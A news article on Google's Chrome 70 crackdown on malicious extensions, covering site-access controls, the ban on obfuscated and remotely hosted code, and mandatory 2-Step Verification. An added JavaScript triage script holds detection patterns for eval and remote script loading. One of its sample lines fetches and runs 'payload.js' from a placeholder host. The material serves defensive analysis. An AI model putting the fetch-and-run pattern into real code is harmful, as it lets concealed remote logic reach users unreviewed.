Whether it is because of overworked reviewers, obfuscated code, or the use of external scripts, malicious Chrome extensions have become a huge problem for Google, with new ones being added to the Chrome Web Store every day.
In an announcement today, Google has stated that they are dropping the hammer on malicious extensions and will no longer tolerate ones that ask for powerful permissions for no reason, use external scripts, or obfuscate their code.
In the current version of Chrome, an extension has the ability to get full access to all of the data and content of a web site that you are visiting. This allows beneficial extensions to be created that modify the skin of a site, add extra features, or fix bugs on sites.
At the same time, this also allows extensions to inject advertisements, steal social profile information, inject in-browser miners, steal login information, access other web sites, and perform a variety of other malicious activities.
With Chrome 70, users will now have the ability to restrict the sites an extension has access to. With this new setting, you can specify that the extension only has access "when you click the extension", on a specific site, or on all sites.
Unfortunately, according to Google's User Controls For Host Permissions: Transition Guide, it appears that users will need to make these changes themselves, rather than extensions being restricted by default.
"What happens to my current users' settings? This change will not immediately affect any current permissions granted to your extension. That is, it will continue to operate as before unless the user takes action to restrict the sites it is allowed to access. In future releases, Chrome will provide more controls to users to adjust settings."
Extensions that request powerful permissions, or full access to sites, will now be subject to additional review. Google has also stated that it will be looking closely at extensions that utilize remotely hosted code, with ongoing monitoring.
Whether this will include Google Analytics, which is heavily used by new tab and search hijacking extensions to track users, is unknown. Google also has not indicated whether search redirects used for the sole purpose of tracking a user's activity will be allowed.
Overall, Google wants a tight package that makes it easier to perform a review, and it does not want to have to examine off-site code that can easily be changed whenever a developer wishes.
"Your extension’s permissions should be as narrowly-scoped as possible, and all your code should be included directly in the extension package, to minimize review time."
Analyzing extensions can be time-consuming, as most malicious Chrome extensions are obfuscated. This means the developers use special tools that make it harder to see what the extension's scripts are doing.
As Google steps up its review process, it needs the code to be easier to review. This is a welcome change and one that will make things easier not only for Google but for people like myself who commonly analyze Chrome extensions to look for malicious behavior.
"Today over 70% of malicious and policy violating extensions that we block from Chrome Web Store contain obfuscated code. At the same time, because obfuscation is mainly used to conceal code functionality, it adds a great deal of complexity to our review process. This is no longer acceptable given the aforementioned review process changes."
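As an added example (not from the article or from Google), the following JavaScript triage heuristic shows one way an analyst can separate merely minified code from obfuscated code, the distinction the policy above draws, and flag scripts that pull code from a remote host; the indicator list and the sample scripts are constructed for the demo.

```javascript
// Added example: heuristic triage of extension scripts. Minification only
// strips whitespace and shortens names; obfuscation hides what the code does
// (encoded strings, dynamic evaluation, code fetched at runtime).
// The indicator regexes below are a constructed starting point, not a
// complete detector, and the sample scripts are constructed for this demo.

const INDICATORS = [
  { name: "dynamic-eval",    re: /\beval\s*\(|\bnew\s+Function\s*\(/ },
  { name: "char-decoding",   re: /String\.fromCharCode|\batob\s*\(/ },
  { name: "hex-escapes",     re: /(\\x[0-9a-f]{2}){4,}/i },
  { name: "unicode-escapes", re: /(\\u[0-9a-f]{4}){4,}/i },
  // Code loaded from a URL at runtime is exactly what a store review cannot see.
  { name: "remote-script",   re: /\b(?:fetch|importScripts)\s*\(\s*["']https?:\/\// },
];

function analyzeScript(source) {
  const hits = INDICATORS.filter(i => i.re.test(source)).map(i => i.name);
  // Obfuscators emit long escaped strings, so the share of backslashes in
  // the source is a cheap secondary signal that catches escape styles the
  // regexes above do not enumerate.
  const escapeRatio = (source.match(/\\/g) || []).length / Math.max(source.length, 1);
  const verdict = hits.length > 0 || escapeRatio > 0.05 ? "obfuscated" : "minified-or-plain";
  return { verdict, hits, escapeRatio: Number(escapeRatio.toFixed(3)) };
}

// Constructed sample 1: minified only (renamed identifiers, no whitespace).
const MINIFIED = 'function a(b){return b.filter(c=>c.active).map(c=>c.id)}';

// Constructed sample 2: obfuscated; a hex-encoded string array plus an eval
// of a string rebuilt from character codes.
const OBFUSCATED =
  'var _0x1=["\\x63\\x6f\\x6e\\x73\\x6f\\x6c\\x65"];' +
  'eval(String.fromCharCode(97,108,101,114,116)+"(1)");';

// Constructed sample 3: readable code that fetches its real logic remotely
// (example.com is a placeholder host).
const REMOTE = 'fetch("https://example.com/payload.js").then(r => r.text()).then(run);';

console.log(analyzeScript(MINIFIED));   // verdict "minified-or-plain", no hits
console.log(analyzeScript(OBFUSCATED)); // verdict "obfuscated"
console.log(analyzeScript(REMOTE));     // verdict "obfuscated", hit "remote-script"
```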
This policy still allows developers to minify their extension's code with the following methods:
In the past, very popular extensions, such as MEGA, have been hacked and replaced with a malicious variant. Due to this, in 2019 Google will require all Chrome extension developers to enable 2-Step Verification on their Chrome Web Store developer accounts.
This will make it much harder for an attacker to hack an account, as they would also need the developer's authentication device, such as their mobile phone, to do so.